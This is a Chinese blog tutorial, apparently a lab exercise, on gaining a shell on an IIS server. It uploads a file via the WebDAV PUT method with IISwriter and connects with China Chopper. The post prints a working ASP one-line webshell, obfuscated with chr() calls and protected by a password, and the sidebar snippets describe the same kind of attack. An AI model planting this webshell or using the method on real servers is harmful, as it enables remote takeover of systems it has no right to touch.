使用中国菜刀(结合一句话木马)通过Iiswriter的put方法getshell

最新推荐文章于 2024-06-06 23:02:55 发布
最新推荐文章于 2024-06-06 23:02:55 发布
阅读量3.5k 收藏 1
点赞数 2
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/103774844
版权
  • 1.在客户端安装iiswrite软件,并关闭客户端防火墙

 

 

 

  • 2.服务器安装iis,勾选以下选项

 

  • 3.更改iis网站的主目录,将所有权限都勾选,再将网址的权限里来宾账户的权限改为完全控制

 

  • 4.在客户机使用iiswrite对服务器所在文夹件上传一个txt文件并改后缀为asp,内容为<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("shezhang"))%>

 

 

  • 5.客户机进行访问http://192.168.16.139/shell.asp

  • 6.添加shell,运行

     

 

卖N孩的X火柴
关注
专栏目录
【实战系列3】IIS PUT文件上传漏洞GetShell
04-10 2639
IIS(Internet Information Services)PUT文件上传漏洞是一种安全漏洞,影响微软的IIS服务器。它允许攻击者通过HTTP PUT请求上传任意文件到服务器上,从而可能导致恶意文件的上传和执行,可能引发远程代码执行攻击,导致服务器被攻陷。
IISPUT漏洞扫描器
10-03
iisput漏洞扫描利器 虽然iisput漏洞已经十分古老了,但还是可以试试的。
IIS-PUT上传漏洞
swordheart的博客
11-30 3803
IIS-PUT上传漏洞 IIS Server 在 Web 服务扩展中开启了 WebDAV ,网站配置了可以写入的权限,造成任意文件上传。影响版本6.0 包括配置了脚本资源访问的权限 使用burpsuite 进行测试,先PUT上传1.txt的asp的一句话 本来put上传后的状态码应该是201,由于服务器已经put上传了1.txt,所以返回的状态码为200 然后通过copy或者move方法复制或移动到指定123.asp文件当中去。 当然Destination这个是指定你创建的asp
49-渗透测试模拟实战-tomexam网络考试系统
最新发布
XLbb的博客
06-06 1832
web漏洞扫描工具:appscan、awvs(Acunetix)、Netsparker. 系统漏洞扫描工具:nessus 信息收集: 域名:fofa、谷歌、百度、零零信安等搜索引擎、DNS历史记录、DNS备案号查询、https证书 敏感信息:谷歌搜索,社工库检索、威胁情报、天眼查、零零信安、7kb、破壳、dirsearch IP地址:有CDN通过fofa标签找到真实ip、文件的hash值、网站证书、dns历史记录 网站指纹:wappalyzer插件、御剑web指纹识别、在线平台 端口:nmap
IIS PUT漏洞原理和复现
p_utao的博客
01-27 903
漏洞成因 IIS server在WEB服务拓展中开启了WebDAV,配置了写入权限,脚本资源访问权限。导致任意文件上传 本地搭建 首先允许webDAV 查看IP命令为ipconfig 把IP地址调整为这台机器的IP地址 返回访问该IP 因为这里主要是为了锻炼写POC,当然也可以直接使用桂林老兵验证直接写shell POC验证 POC验证: import requests url = "http://IP" r = requests.options(url) result = r.headers[
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
【描述】中提到的“Mac8.0的一款getshell工具 直接传一句话 用菜刀连就行了”意味着这个工具能够利用MacCMS 8.0的某个安全漏洞,向服务器发送特定的命令(“一句话木马”),从而在目标系统上获得一个shell。...
Cknife 一句话连接工具.7z
07-17
【标签】"cknife 菜刀 jsp一句话"是关键词,"cknife"和"菜刀"都是对Cknife工具的别称,"jsp一句话"则特指上述的1.jsp木马,它是基于Java的Webshell,能够在被入侵的Web服务器上执行命令。 【压缩包子文件的文件名称...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
用php实现批量查询清除一句话后门的代码
10-30
一句话后门是一种常见的网页木马攻击方式,攻击者通过在网页代码中插入一段简短的恶意代码来获取网站的控制权。因其代码简短,隐蔽性强,所以很难被发现,并且危害巨大。 首先,文档中提到了一个名为Xall.php的文件...
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
最后,使用中国菜刀对当前一句话木马进行连接。 三、PHP一句话木马写入数据库或者网页文件的方式 一句话木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D...
IIS6.0 put文件上传GetShell
内心不种满鲜花就会长满杂草
05-24 2916
IIS服务器开启了webdav服务扩展,又设置了来宾账户对web目录拥有写入权限时,可以被恶意攻击者利用,直接上传恶意文件。
靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用
weixin_47306547的博客
11-09 2088
目录 环境 主机发现 端口扫描 漏洞挖掘 GetShell 法一 法二 法三 提权 chkrootkit 漏洞提权 法一 法二 法三 防火墙规则 清痕迹,留后门 环境 链接:https://pan.baidu.com/s/1OI1bYsnS_LBvMIrQCt1yuw 提取码:lish 主机发现 端口扫描 漏洞挖掘 查看网页支持的访问方式: nmap --script=http-methods --...
iiswriter配合菜刀通过put和move请求方式拿下iis6,.0getshell
Night_time的博客
04-29 579
实验环境:windows2003虚拟机 pc端windows 10 实验工具:iiswriter 菜刀 实验步骤: 一,win3搭建iis服务器 搭建步骤: 我的电脑——》CD驱动器——》安装可选的windows组件 找到 ——》应用程序服务器 勾选ASP,NET //允许计算机运行sap和net应用程序 这里只用到asp 点击internet信息服务(ii...
渗透测试系列之iis解析漏洞getshell+内网渗透
win176489的博客
06-27 3222
本次渗透测试经验分享仅供大家学习交流 本次利用的环境为内网web服务器windows2003(模拟内网主机 ip192.168.152.128 192.168.79.128) 一台外网主机 (ip xxx.xxx.xxx.xxx ) 攻击机win10(ip 192.168.31.169) kali机(192.168.31.43) 环...
IISwriter工具对IIS服务器写入shell实验
Kongfu_Lee的博客
09-15 695
通过PUT以及MOVE的请求方式对IIS服务器写入shell实验 实验准备 一台Windows server 2003虚拟机模拟靶机 一台Windows 7虚拟机模拟攻击机 实验环境搭建 1、在靶机上搭建IIS服务器 2、在IIS服务器设置中赋予网站主目录写入权限 3、确认攻击机可以正常访问靶机的IIS网站主页 4、在IIS服务器的主目录下添加文本文件,内容为<%=now()%> 5、将文件更名为test.asp,通过浏览器访问,测试IIS服务器能够正常执行ASP脚本 6、开放
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 6931
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exe、iiswrite等工具。
iis6.0-put漏洞
m0_65150886的博客
10-17 752
根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。而IIS Server 如果在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,结合put协议就会造成任意文件上传漏洞。
小孩子不懂事,写着玩的
qq_45981247的博客
04-24 528
自用笔记
iiswriter结合中国菜刀iis6.0),完成通过put方法拿下服务器权限
cxrpty的博客
12-31 1645
一、关闭客户端的杀毒软件和防火墙 二、在客户端安装iiswrite软件 三、在服务器安装iis服务器,并添加以下插件 四、修改网站主目录和来宾账户的权限 五、返回客户端,用put方式上传一个txt文件 六、改txt文件的后缀为asp 七、客户机访问http://192.168.148.133/shell.asp 八、添加shell,并运行 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值